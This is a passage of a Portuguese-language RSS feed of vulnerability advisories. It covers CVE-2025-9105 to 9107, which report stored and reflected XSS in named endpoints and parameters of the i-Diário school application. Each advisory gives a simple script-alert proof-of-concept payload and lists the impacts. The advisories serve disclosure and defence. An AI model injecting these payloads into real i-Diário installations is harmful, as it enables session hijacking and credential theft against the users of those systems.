    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9105/image.png&amp;#34;
	width=&amp;#34;964&amp;#34;
	height=&amp;#34;445&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9105/image_hu_6a8ccd33487555d5.png 480w, /p/cve-2025-9105/image_hu_3c579fd2be61c8bf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9105/image-1.png&amp;#34;
	width=&amp;#34;682&amp;#34;
	height=&amp;#34;415&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9105/image-1_hu_79d858c0f7af1de1.png 480w, /p/cve-2025-9105/image-1_hu_a6bd84db6d6c2b22.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;164&amp;#34;
		data-flex-basis=&amp;#34;394px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9106</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9106/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9106/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9106-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9106: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9106-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-ensino-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9106: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9106/image.png&amp;#34;
	width=&amp;#34;960&amp;#34;
	height=&amp;#34;455&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9106/image_hu_bfb635a7cbffc853.png 480w, /p/cve-2025-9106/image_hu_8eac10bb6159118e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;210&amp;#34;
		data-flex-basis=&amp;#34;506px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9106/image-1.png&amp;#34;
	width=&amp;#34;653&amp;#34;
	height=&amp;#34;412&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9106/image-1_hu_aec1559962a33def.png 480w, /p/cve-2025-9106/image-1_hu_8b0ce06d2d54dc01.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;158&amp;#34;
		data-flex-basis=&amp;#34;380px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9107</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9107/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9107/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9107-cross-site-scripting-xss-refletido-no-endpoint-search_autocomplete-parâmetro-q&amp;#34;&amp;gt;CVE-2025-9107: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9107-cross-site-scripting-xss-refletido-no-endpoint-search_autocomplete-parâmetro-q&amp;#34;&amp;gt;CVE-2025-9107: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span 